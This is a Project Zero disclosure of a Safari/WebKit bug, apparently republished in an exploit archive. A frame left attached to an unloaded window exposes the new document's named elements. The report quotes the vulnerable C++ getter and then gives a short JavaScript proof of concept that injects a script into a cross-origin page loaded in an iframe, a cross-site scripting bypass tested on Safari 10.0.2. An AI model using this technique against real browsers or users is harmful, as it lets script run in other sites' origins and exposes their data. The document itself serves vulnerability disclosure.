<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1063 The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function. static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot) { ... Document* document = frame.document(); <<-------- the new document. if (is<HTMLDocument>(*document)) { auto& htmlDocument = downcast<HTMLDocument>(*document); auto* atomicPropertyName = propertyName.publicName(); if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) { JSValue namedItem; if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) { Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName); ASSERT(collection->length() > 1); namedItem = toJS(exec, thisObject->globalObject(), collection); } else namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName)); slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem); return true; } } return false; } PoC: --> "use strict"; let f = document.body.appendChild(document.createElement("iframe")); let get_element = f.contentWindow.Function("return logo;"); f.onload = () => { f.onload = null; let node = get_element(); var sc = document.createElement("script"); sc.innerText = "alert(location)"; node.appendChild(sc); }; f.src = "https://abc.xyz/"; <!-- Tested on Safari 10.0.2(12602. -->